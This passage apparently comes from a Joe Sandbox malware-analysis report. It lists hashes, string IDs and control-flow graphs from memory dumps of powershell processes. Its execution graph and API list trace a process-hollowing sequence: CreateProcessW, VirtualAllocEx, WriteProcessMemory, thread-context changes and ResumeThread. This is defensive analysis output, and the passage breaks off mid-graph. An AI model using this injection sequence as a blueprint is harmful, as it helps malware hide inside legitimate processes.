                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                              • API String ID: 0-1420252700
                                                                                                                                                              • Opcode ID: 5bad9f6735cd966637efc83f0759a200b0c7bc5c149ea50a2efba5bbbcf7fb3c
                                                                                                                                                              • Instruction ID: 6ad2c6fd24abbe4bd4d1e12be2965acaa29a59365e038fc360fab664a0a3ee44
                                                                                                                                                              • Opcode Fuzzy Hash: 5bad9f6735cd966637efc83f0759a200b0c7bc5c149ea50a2efba5bbbcf7fb3c
                                                                                                                                                              • Instruction Fuzzy Hash: E98169B0B04215CFDB15DB79D8046AABFF5AF8625CF1484ABDC09CB251DB32C849C791
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                                              • Opcode ID: 80f889bf50b00cf1622ae0067a39c5976b23af09fb1660e513c1f22ea5b4cdc7
                                                                                                                                                              • Instruction ID: bcc4276e4a664cacebe4ee07c78c2486043184339858ed6451f1110bed1cf1c0
                                                                                                                                                              • Opcode Fuzzy Hash: 80f889bf50b00cf1622ae0067a39c5976b23af09fb1660e513c1f22ea5b4cdc7
                                                                                                                                                              • Instruction Fuzzy Hash: 9A213BB171032A6BDB34D57A9C01B27ABDE5BC179CF64883EA809CB3C5CD72C8468761
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                              • Opcode ID: 27c7ac940d77598e1917ea772de09a970aab1e04f8be770adabe7366939ccc38
                                                                                                                                                              • Instruction ID: e5810861b1c3646cbcfb13dbfd1087932a02bee6a1cedd51a8c429a63e876240
                                                                                                                                                              • Opcode Fuzzy Hash: 27c7ac940d77598e1917ea772de09a970aab1e04f8be770adabe7366939ccc38
                                                                                                                                                              • Instruction Fuzzy Hash: 68018FA1B0D3954FC72B423C18341296FBA2FC361436945EBC881DF2ABDD598C49C3A2

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:5.7%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:53
                                                                                                                                                              Total number of Limit Nodes:4
                                                                                                                                                              execution_graph 8431 45a7d87 8432 45a7d71 8431->8432 8433 45a7e2d 8432->8433 8436 45a8763 8432->8436 8437 45a8777 8436->8437 8438 45a7e85 8437->8438 8441 45a87cd 8437->8441 8461 45a87d0 8437->8461 8443 45a87d0 8441->8443 8452 45a8dc8 8443->8452 8481 45a7310 8443->8481 8444 45a88d8 8445 45a731c Wow64SetThreadContext 8444->8445 8444->8452 8446 45a8943 8445->8446 8447 45a8a56 VirtualAllocEx 8446->8447 8446->8452 8448 45a8aa3 8447->8448 8449 45a8af1 VirtualAllocEx 8448->8449 8451 45a8b45 8448->8451 8448->8452 8449->8451 8450 45a7334 WriteProcessMemory 8460 45a8b8f 8450->8460 8451->8450 8451->8452 8452->8437 8453 45a8cd9 8453->8452 8454 45a7334 WriteProcessMemory 8453->8454 8455 45a8d02 8454->8455 8455->8452 8456 45a7340 Wow64SetThreadContext 8455->8456 8457 45a8d77 8456->8457 8457->8452 8458 45a8d88 ResumeThread 8457->8458 8458->8452 8459 45a7334 WriteProcessMemory 8459->8460 8460->8452 8460->8453 8460->8459 8463 45a884d 8461->8463 8462 45a8dc8 8462->8437 8463->8462 8464 45a7310 CreateProcessW 8463->8464 8465 45a88d8 8464->8465 8465->8462 8485 45a731c 8465->8485 8467 45a8943 8467->8462 8468 45a8a56 VirtualAllocEx 8467->8468 8469 45a8aa3 8468->8469 8469->8462 8470 45a8af1 VirtualAllocEx 8469->8470 8472 45a8b45 8469->8472 8470->8472 8472->8462 8489 45a7334 8472->8489 8473 45a8b8f 8473->8462 8474 45a8cd9 8473->8474 8480 45a7334 WriteProcessMemory 8473->8480 8474->8462 8475 45a7334 WriteProcessMemory 8474->8475 8476 45a8d02 8475->8476 8476->8462 8493 45a7340 8476->8493 8479 45a8d88 ResumeThread 8479->8462 8480->8473 8482 45a8fd0 CreateProcessW 8481->8482 8484 45a9129 8482->8484 8486 45a9210 Wow64SetThreadContext 8485->8486 8488 45a928a 8486->8488 8488->8467 8490 45a9388 WriteProcessMemory 8489->8490 8492 45a9413 8490->8492 8492->8473 8494 45a9210 Wow64SetThreadContext 8493->8494 8496 45a8d77 8494->8496 8496->8462 8496->8479

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 73f09c8-73f09eb 1 73f0bc6-73f0c0e 0->1 2 73f09f1-73f09f6 0->2 10 73f0d7b-73f0d99 1->10 11 73f0c14-73f0c19 1->11 3 73f0a0e-73f0a12 2->3 4 73f09f8-73f09fe 2->4 8 73f0b73-73f0b7d 3->8 9 73f0a13-73f0a1c 3->9 6 73f0a02-73f0a0c 4->6 7 73f0a00 4->7 6->3 7->3 12 73f0b7f-73f0b88 8->12 13 73f0b8b-73f0b91 8->13 14 73f0a2f 9->14 15 73f0a1e-73f0a2d 9->15 35 73f0d3e-73f0d3f 10->35 36 73f0d9b-73f0dad 10->36 17 73f0c1b-73f0c21 11->17 18 73f0c31-73f0c35 11->18 19 73f0b97-73f0ba3 13->19 20 73f0b93-73f0b95 13->20 16 73f0a31-73f0a33 14->16 15->16 16->8 28 73f0a39-73f0a59 16->28 23 73f0c25-73f0c2f 17->23 24 73f0c23 17->24 26 73f0c3b-73f0c3d 18->26 27 73f0d2a-73f0d34 18->27 25 73f0ba5-73f0bc3 19->25 20->25 23->18 24->18 33 73f0c3f-73f0c4b 26->33 34 73f0c4d 26->34 30 73f0d36-73f0d3d 27->30 31 73f0d42-73f0d48 27->31 54 73f0a5b-73f0a76 28->54 55 73f0a78 28->55 30->35 37 73f0d4e-73f0d5a 31->37 38 73f0d4a-73f0d4c 31->38 40 73f0c4f-73f0c51 33->40 34->40 43 73f0daf-73f0dbb 36->43 44 73f0dbd 36->44 45 73f0d5c-73f0d78 37->45 38->45 40->27 46 73f0c57-73f0c59 40->46 48 73f0dbf-73f0dc1 43->48 44->48 50 73f0c5b-73f0c67 46->50 51 73f0c69 46->51 56 73f0e0d-73f0e17 48->56 57 73f0dc3-73f0dc9 48->57 53 73f0c6b-73f0c6d 50->53 51->53 53->27 59 73f0c73-73f0c75 53->59 62 73f0a7a-73f0a7c 54->62 55->62 63 73f0e19-73f0e1f 56->63 64 73f0e22-73f0e28 56->64 60 73f0dcb-73f0dcd 57->60 61 73f0dd7-73f0df4 57->61 66 73f0c8f-73f0c93 59->66 67 73f0c77-73f0c7d 59->67 60->61 85 73f0e5a-73f0e5f 61->85 86 73f0df6-73f0e07 61->86 62->8 71 73f0a82-73f0a84 62->71 69 73f0e2e-73f0e3a 64->69 70 73f0e2a-73f0e2c 64->70 75 73f0cad-73f0d27 66->75 76 73f0c95-73f0c9b 66->76 72 73f0c7f 67->72 73 73f0c81-73f0c8d 67->73 74 73f0e3c-73f0e57 69->74 70->74 77 73f0a86-73f0a92 71->77 78 73f0a94 71->78 72->66 73->66 74->85 83 73f0c9f-73f0cab 76->83 84 73f0c9d 76->84 80 73f0a96-73f0a98 77->80 78->80 80->8 90 73f0a9e-73f0abe 80->90 83->75 84->75 85->86 86->56 98 73f0ad6-73f0ada 90->98 99 73f0ac0-73f0ac6 90->99 102 73f0adc-73f0ae2 98->102 103 73f0af4-73f0af8 98->103 100 73f0aca-73f0acc 99->100 101 73f0ac8 99->101 100->98 101->98 104 73f0ae6-73f0af2 102->104 105 73f0ae4 102->105 106 73f0aff-73f0b01 103->106 104->103 105->103 107 73f0b19-73f0b70 106->107 108 73f0b03-73f0b09 106->108 110 73f0b0d-73f0b0f 108->110 111 73f0b0b 108->111 110->107 111->107
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2117852418.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_73f0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-3310885943
                                                                                                                                                              • Opcode ID: 03596c23ea8be7b12b8edfd584c3417cef106ef85f6fe2ad5a6549d84bbde7eb
                                                                                                                                                              • Instruction ID: 09b2fe11547181776278a6cbe9ea19affb2c5564dcab27b03a18a3100876c7c1
                                                                                                                                                              • Opcode Fuzzy Hash: 03596c23ea8be7b12b8edfd584c3417cef106ef85f6fe2ad5a6549d84bbde7eb
                                                                                                                                                              • Instruction Fuzzy Hash: 23C12AB1B0030A9FFB2C8E7D981076ABBE5AFC1690F24846BD64DCF256DA31D845C761

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 113 73f13a0-73f13c6 114 73f13cc-73f13d1 113->114 115 73f1572-73f1584 113->115 116 73f13e9-73f13ed 114->116 117 73f13d3-73f13d9 114->117 129 73f159b-73f15ba 115->129 130 73f1586-73f1599 115->130 119 73f151e-73f1528 116->119 120 73f13f3-73f13f5 116->120 121 73f13dd-73f13e7 117->121 122 73f13db 117->122 126 73f152a-73f1533 119->126 127 73f1536-73f153c 119->127 124 73f13f7-73f1403 120->124 125 73f1405 120->125 121->116 122->116 131 73f1407-73f1409 124->131 125->131 132 73f153e-73f1540 127->132 133 73f1542-73f154e 127->133 134 73f16ec-73f171d 129->134 135 73f15c0-73f15c5 129->135 130->129 131->119 136 73f140f-73f1413 131->136 137 73f1550-73f156f 132->137 133->137 155 73f171f-73f172b 134->155 156 73f172d 134->156 138 73f15dd-73f15e1 135->138 139 73f15c7-73f15cd 135->139 140 73f1426 136->140 141 73f1415-73f1424 136->141 146 73f169e-73f16a8 138->146 147 73f15e7-73f15e9 138->147 143 73f15cf 139->143 144 73f15d1-73f15db 139->144 145 73f1428-73f142a 140->145 141->145 143->138 144->138 145->119 152 73f1430-73f1432 145->152 150 73f16aa-73f16b2 146->150 151 73f16b5-73f16bb 146->151 153 73f15eb-73f15f7 147->153 154 73f15f9 147->154 158 73f16bd-73f16bf 151->158 159 73f16c1-73f16cd 151->159 161 73f1434-73f1440 152->161 162 73f1442 152->162 163 73f15fb-73f15fd 153->163 154->163 157 73f172f-73f1731 155->157 156->157 166 73f179f-73f17a9 157->166 167 73f1733-73f1752 157->167 168 73f16cf-73f16e9 158->168 159->168 169 73f1444-73f1446 161->169 162->169 163->146 165 73f1603-73f1605 163->165 170 73f161f-73f162a 165->170 171 73f1607-73f160d 165->171 174 73f17ab-73f17af 166->174 175 73f17b2-73f17b8 166->175 199 73f1754-73f1760 167->199 200 73f1762 167->200 169->119 173 73f144c-73f144e 169->173 195 73f162c-73f1632 170->195 196 73f1642-73f169b 170->196 178 73f160f 171->178 179 73f1611-73f161d 171->179 182 73f1468-73f1473 173->182 183 73f1450-73f1456 173->183 176 73f17be-73f17ca 175->176 177 73f17ba-73f17bc 175->177 186 73f17cc-73f17ea 176->186 177->186 178->170 179->170 187 73f1475-73f1478 182->187 188 73f1482-73f148e 182->188 184 73f145a-73f1466 183->184 185 73f1458 183->185 184->182 185->182 187->188 193 73f149c-73f14a3 188->193 194 73f1490-73f1492 188->194 206 73f14aa-73f14ac 193->206 194->193 202 73f1636-73f1638 195->202 203 73f1634 195->203 205 73f1764-73f1766 199->205 200->205 202->196 203->196 205->166 207 73f1768-73f1785 205->207 209 73f14ae-73f14b4 206->209 210 73f14c4-73f151b 206->210 215 73f17ed-73f17f2 207->215 216 73f1787-73f1799 207->216 212 73f14b8-73f14ba 209->212 213 73f14b6 209->213 212->210 213->210 215->216 216->166
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2117852418.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_73f0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-3512890053
                                                                                                                                                              • Opcode ID: d64999ddb1a5120ccb60db749f297356b415f2e807a8fb784c3aadb93c458098
                                                                                                                                                              • Instruction ID: 4b70cc805747d3f6b749e9ff51ded6df08805e326d077cefb7410bb3d31095ca
                                                                                                                                                              • Opcode Fuzzy Hash: d64999ddb1a5120ccb60db749f297356b415f2e807a8fb784c3aadb93c458098
                                                                                                                                                              • Instruction Fuzzy Hash: 3BB16CF1B0431EDFEB258E69E40066ABBF5AFC1650F28846BD90DCB251DB31C945C751

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 218 73f00f0-73f0115 219 73f028d-73f02d3 218->219 220 73f011b-73f0120 218->220 226 73f042a-73f0434 call 73f0439 219->226 227 73f02d9-73f02de 219->227 221 73f0138-73f0144 220->221 222 73f0122-73f0128 220->222 232 73f023a-73f0244 221->232 233 73f014a-73f014d 221->233 224 73f012c-73f0136 222->224 225 73f012a 222->225 224->221 225->221 229 73f02f6-73f02fa 227->229 230 73f02e0-73f02e6 227->230 239 73f03d7-73f03e1 229->239 240 73f0300-73f0302 229->240 234 73f02ea-73f02f4 230->234 235 73f02e8 230->235 236 73f0246-73f024f 232->236 237 73f0252-73f0258 232->237 233->232 238 73f0153-73f015a 233->238 234->229 235->229 244 73f025e-73f026a 237->244 245 73f025a-73f025c 237->245 238->219 246 73f0160-73f0165 238->246 242 73f03ef-73f03f5 239->242 243 73f03e3-73f03ec 239->243 247 73f0304-73f0310 240->247 248 73f0312 240->248 250 73f03fb-73f0407 242->250 251 73f03f7-73f03f9 242->251 253 73f026c-73f028a 244->253 245->253 254 73f017d-73f0181 246->254 255 73f0167-73f016d 246->255 256 73f0314-73f0316 247->256 248->256 257 73f0409-73f0427 250->257 251->257 254->232 262 73f0187-73f0189 254->262 259 73f016f 255->259 260 73f0171-73f017b 255->260 256->239 261 73f031c-73f0320 256->261 259->254 260->254 267 73f0322-73f033e 261->267 268 73f0340 261->268 263 73f018b-73f0197 262->263 264 73f0199 262->264 269 73f019b-73f019d 263->269 264->269 270 73f0342-73f0344 267->270 268->270 269->232 273 73f01a3-73f01a5 269->273 270->239 274 73f034a-73f035d 270->274 277 73f01bf-73f01c8 273->277 278 73f01a7-73f01ad 273->278 286 73f0363-73f0365 274->286 287 73f01ca-73f01d0 277->287 288 73f01e0-73f0237 277->288 281 73f01af 278->281 282 73f01b1-73f01bd 278->282 281->277 282->277 290 73f037d-73f03d4 286->290 291 73f0367-73f036d 286->291 292 73f01d4-73f01d6 287->292 293 73f01d2 287->293 294 73f036f 291->294 295 73f0371-73f0373 291->295 292->288 293->288 294->290 295->290
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2117852418.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_73f0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-3199432138
                                                                                                                                                              • Opcode ID: 9a313bfe829bd30b4740c0c4edeb1ac887002568f64e2575bf31bcc1077ab8d2
                                                                                                                                                              • Instruction ID: b5c4252e5acde49592846b9bd1e6d47002485a48dc71e6533cb7b6570e12db64
                                                                                                                                                              • Opcode Fuzzy Hash: 9a313bfe829bd30b4740c0c4edeb1ac887002568f64e2575bf31bcc1077ab8d2
                                                                                                                                                              • Instruction Fuzzy Hash: 04810DB5B0020ADFEB1C9F7DC94466AB7E5AF85290F14847BD60DCB216EB32C845C7A1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 297 73f1f18-73f1f3a 298 73f20b7-73f2102 297->298 299 73f1f40-73f1f45 297->299 305 73f225d-73f2274 298->305 306 73f2108-73f210d 298->306 300 73f1f5d-73f1f69 299->300 301 73f1f47-73f1f4d 299->301 311 73f1f6f-73f1f72 300->311 312 73f2062-73f206c 300->312 302 73f1f4f 301->302 303 73f1f51-73f1f5b 301->303 302->300 303->300 324 73f22c9 305->324 325 73f2276-73f22a2 305->325 309 73f210f-73f2115 306->309 310 73f2125-73f2129 306->310 317 73f2119-73f2123 309->317 318 73f2117 309->318 314 73f212f-73f2133 310->314 315 73f2208-73f2212 310->315 311->312 313 73f1f78-73f1f7f 311->313 319 73f206e-73f2077 312->319 320 73f207a-73f2080 312->320 313->298 321 73f1f85-73f1f8a 313->321 322 73f2135-73f2146 314->322 323 73f2173 314->323 326 73f2214-73f221d 315->326 327 73f2220-73f2226 315->327 317->310 318->310 328 73f2086-73f2092 320->328 329 73f2082-73f2084 320->329 332 73f1f8c-73f1f92 321->332 333 73f1fa2-73f1fa6 321->333 322->305 354 73f214c-73f2151 322->354 338 73f2175-73f2177 323->338 330 73f22cf-73f22d3 324->330 331 73f23f4-73f23fe 324->331 334 73f244c-73f247c 325->334 335 73f22a8-73f22ad 325->335 336 73f222c-73f2238 327->336 337 73f2228-73f222a 327->337 340 73f2094-73f20b4 328->340 329->340 345 73f22d5-73f22e6 330->345 346 73f2313 330->346 347 73f240c-73f2412 331->347 348 73f2400-73f2409 331->348 350 73f1f96-73f1fa0 332->350 351 73f1f94 332->351 333->312 352 73f1fac-73f1fb0 333->352 374 73f247e-73f249b 334->374 375 73f24b5-73f24bf 334->375 342 73f22af-73f22b5 335->342 343 73f22c5 335->343 353 73f223a-73f225a 336->353 337->353 338->315 344 73f217d-73f2181 338->344 355 73f22b9-73f22c3 342->355 356 73f22b7 342->356 343->324 344->315 357 73f2187-73f2196 344->357 345->334 383 73f22ec-73f22f1 345->383 363 73f2315-73f2317 346->363 358 73f2418-73f2424 347->358 359 73f2414-73f2416 347->359 350->333 351->333 361 73f1fb2-73f1fce 352->361 362 73f1fd0 352->362 367 73f2169-73f2171 354->367 368 73f2153-73f2159 354->368 355->343 356->343 392 73f21ae-73f2205 357->392 393 73f2198-73f219e 357->393 370 73f2426-73f2449 358->370 359->370 373 73f1fd2-73f1fd4 361->373 362->373 363->331 372 73f231d-73f2321 363->372 367->338 379 73f215d-73f2167 368->379 380 73f215b 368->380 372->331 387 73f2327-73f232b 372->387 373->312 376 73f1fda-73f1fe7 373->376 399 73f249d-73f24af 374->399 400 73f2505-73f250a 374->400 377 73f24c8-73f24ce 375->377 378 73f24c1-73f24c5 375->378 412 73f1fee-73f1ff0 376->412 390 73f24d4-73f24e0 377->390 391 73f24d0-73f24d2 377->391 379->367 380->367 394 73f2309-73f2311 383->394 395 73f22f3-73f22f9 383->395 387->331 397 73f2331-73f2357 387->397 401 73f24e2-73f2502 390->401 391->401 403 73f21a2-73f21a4 393->403 404 73f21a0 393->404 394->363 405 73f22fd-73f2307 395->405 406 73f22fb 395->406 397->331 419 73f235d-73f2361 397->419 399->375 400->399 403->392 404->392 405->394 406->394 417 73f2008-73f205f 412->417 418 73f1ff2-73f1ff8 412->418 420 73f1ffc-73f1ffe 418->420 421 73f1ffa 418->421 424 73f2384 419->424 425 73f2363-73f236c 419->425 420->417 421->417 428 73f2387-73f2394 424->428 426 73f236e-73f2371 425->426 427 73f2373-73f2380 425->427 429 73f2382 426->429 427->429 431 73f239a-73f23f1 428->431 429->428
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2117852418.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_73f0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                              • API String ID: 0-1988592219
                                                                                                                                                              • Opcode ID: b98cb5a78dab87ebfc88b1d1686ca5c25b6f750f22dc42bf0d720b61ceccc9c2
                                                                                                                                                              • Instruction ID: 8e92ad97049ebd8d6c19a34e9fbf652bc4b527b8938c04a1b573ed82b39d4737
                                                                                                                                                              • Opcode Fuzzy Hash: b98cb5a78dab87ebfc88b1d1686ca5c25b6f750f22dc42bf0d720b61ceccc9c2
                                                                                                                                                              • Instruction Fuzzy Hash: 94F1F5B1B0430ADFEB149F68D8447AFBBA5FF85350F14C46AD6198B251DB32C885CB91

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 433 45a87d0-45a8881 437 45a8fb9-45a8fc6 433->437 438 45a8887-45a8897 433->438 441 45a8899-45a889e 438->441 442 45a88a0 438->442 443 45a88a2-45a88a4 441->443 442->443 444 45a88bb-45a88da call 45a7310 443->444 445 45a88a6-45a88b9 443->445 449 45a88dc-45a88e1 444->449 450 45a88e3 444->450 445->444 451 45a88e5-45a88e7 449->451 450->451 452 45a8f2f-45a8f42 451->452 453 45a88ed-45a8902 451->453 460 45a8f49-45a8f5f 452->460 456 45a8f2a 453->456 457 45a8908-45a892c 453->457 456->452 457->460 463 45a8932-45a8945 call 45a731c 457->463 460->437 467 45a8f61-45a8f6b 460->467 468 45a894b-45a8952 463->468 469 45a8ecd-45a8ecf 463->469 476 45a8f6d-45a8f74 467->476 477 45a8f76-45a8f78 467->477 470 45a8958-45a8962 468->470 471 45a8eb3-45a8ec6 468->471 470->460 472 45a8968-45a8985 470->472 471->469 472->456 474 45a898b-45a89a5 call 45a7328 472->474 485 45a89ab-45a89b2 474->485 486 45a8ed4 474->486 479 45a8f7a-45a8f7e 476->479 477->479 480 45a8f80 call 45a7f84 479->480 481 45a8f85-45a8f92 479->481 480->481 496 45a8f99-45a8fb6 481->496 488 45a89b8-45a89c1 485->488 489 45a8e99-45a8eac 485->489 492 45a8edb 486->492 490 45a8a2c-45a8a32 488->490 491 45a89c3-45a8a07 488->491 489->471 490->456 493 45a8a38-45a8a48 490->493 500 45a8a09-45a8a0f 491->500 501 45a8a10-45a8a1c 491->501 498 45a8ee5 492->498 493->456 503 45a8a4e-45a8aa1 VirtualAllocEx 493->503 504 45a8eec 498->504 500->501 501->492 505 45a8a22-45a8a26 501->505 510 45a8aaa-45a8ac8 503->510 511 45a8aa3-45a8aa9 503->511 509 45a8ef3 504->509 505->490 507 45a8e7f-45a8e92 505->507 507->489 513 45a8efa 509->513 510->498 514 45a8ace-45a8ad5 510->514 511->510 519 45a8f01 513->519 517 45a8adb-45a8ae2 514->517 518 45a8b5c-45a8b63 514->518 517->504 521 45a8ae8-45a8aef 517->521 518->509 520 45a8b69-45a8b70 518->520 525 45a8f0b 519->525 522 45a8b76-45a8b91 call 45a7334 520->522 523 45a8e65-45a8e78 520->523 521->518 524 45a8af1-45a8b43 VirtualAllocEx 521->524 522->513 533 45a8b97-45a8b9e 522->533 523->507 527 45a8b4c-45a8b56 524->527 528 45a8b45-45a8b4b 524->528 532 45a8f12 525->532 527->518 528->527 537 45a8f19 532->537 535 45a8e4b-45a8e5e 533->535 536 45a8ba4-45a8bad 533->536 535->523 536->456 538 45a8bb3-45a8bb9 536->538 541 45a8f23 537->541 538->456 540 45a8bbf-45a8bca 538->540 540->456 544 45a8bd0-45a8bd6 540->544 541->456 545 45a8cd9-45a8cea 544->545 546 45a8bdc-45a8be1 544->546 545->456 550 45a8cf0-45a8d04 call 45a7334 545->550 546->456 547 45a8be7-45a8bfa 546->547 547->456 551 45a8c00-45a8c13 547->551 550->532 555 45a8d0a-45a8d11 550->555 551->456 556 45a8c19-45a8c2e 551->556 557 45a8e17-45a8e2a 555->557 558 45a8d17-45a8d1d 555->558 556->519 563 45a8c34-45a8c38 556->563 572 45a8e31-45a8e44 557->572 558->456 559 45a8d23-45a8d34 558->559 559->537 565 45a8d3a-45a8d3e 559->565 566 45a8c3e-45a8c47 563->566 567 45a8cbf-45a8cc2 563->567 568 45a8d49-45a8d51 565->568 569 45a8d40-45a8d43 565->569 566->456 571 45a8c4d-45a8c50 566->571 567->456 570 45a8cc8-45a8ccb 567->570 568->456 573 45a8d57-45a8d61 568->573 569->568 570->456 574 45a8cd1-45a8cd3 570->574 571->456 575 45a8c56-45a8c86 571->575 572->535 573->460 576 45a8d67-45a8d79 call 45a7340 573->576 574->545 574->546 575->456 584 45a8c8c-45a8ca5 call 45a7334 575->584 576->541 582 45a8d7f-45a8d86 576->582 585 45a8d88-45a8dc6 ResumeThread 582->585 586 45a8de3-45a8df6 582->586 590 45a8caa-45a8cac 584->590 588 45a8dc8-45a8dce 585->588 589 45a8dcf-45a8ddc 585->589 593 45a8dfd-45a8e10 586->593 588->589 592 45a8dde-45a8f94 589->592 589->593 590->525 595 45a8cb2-45a8cb9 590->595 592->496 593->557 595->567 595->572
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 045A8A8A
                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 045A8B2C
                                                                                                                                                                • Part of subcall function 045A7334: WriteProcessMemory.KERNELBASE(?,00000000,00000000,185D2514,00000000,?,?,?,00000000,00000000,?,045A8B8F,?,00000000,?), ref: 045A9404
                                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 045A8DAF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2075703369.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_45a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual$MemoryProcessResumeThreadWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2390764575-0
                                                                                                                                                              • Opcode ID: ec5eb446f64e8d61945b8883fabbb9d1effcbaff1d297d87bafa265bbeea6f9d
                                                                                                                                                              • Instruction ID: 0dd44d95d7eaf93adb55736995056cdd2677167e15547fa27aa5e4ce46b4dfdc
                                                                                                                                                              • Opcode Fuzzy Hash: ec5eb446f64e8d61945b8883fabbb9d1effcbaff1d297d87bafa265bbeea6f9d
                                                                                                                                                              • Instruction Fuzzy Hash: 73129270B0021A8BEB24AF25D85479DB7F2BF84344F1484A9D809AB391EF30ED95DF52

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 600 45a87cd-45a8881 605 45a8fb9-45a8fc6 600->605 606 45a8887-45a8897 600->606 609 45a8899-45a889e 606->609 610 45a88a0 606->610 611 45a88a2-45a88a4 609->611 610->611 612 45a88bb-45a88da call 45a7310 611->612 613 45a88a6-45a88b9 611->613 617 45a88dc-45a88e1 612->617 618 45a88e3 612->618 613->612 619 45a88e5-45a88e7 617->619 618->619 620 45a8f2f-45a8f42 619->620 621 45a88ed-45a8902 619->621 628 45a8f49-45a8f5f 620->628 624 45a8f2a 621->624 625 45a8908-45a892c 621->625 624->620 625->628 631 45a8932-45a8945 call 45a731c 625->631 628->605 635 45a8f61-45a8f6b 628->635 636 45a894b-45a8952 631->636 637 45a8ecd-45a8ecf 631->637 644 45a8f6d-45a8f74 635->644 645 45a8f76-45a8f78 635->645 638 45a8958-45a8962 636->638 639 45a8eb3-45a8ec6 636->639 638->628 640 45a8968-45a8985 638->640 639->637 640->624 642 45a898b-45a89a5 call 45a7328 640->642 653 45a89ab-45a89b2 642->653 654 45a8ed4 642->654 647 45a8f7a-45a8f7e 644->647 645->647 648 45a8f80 call 45a7f84 647->648 649 45a8f85-45a8f92 647->649 648->649 664 45a8f99-45a8fb6 649->664 656 45a89b8-45a89c1 653->656 657 45a8e99-45a8eac 653->657 660 45a8edb 654->660 658 45a8a2c-45a8a32 656->658 659 45a89c3-45a8a07 656->659 657->639 658->624 661 45a8a38-45a8a48 658->661 668 45a8a09-45a8a0f 659->668 669 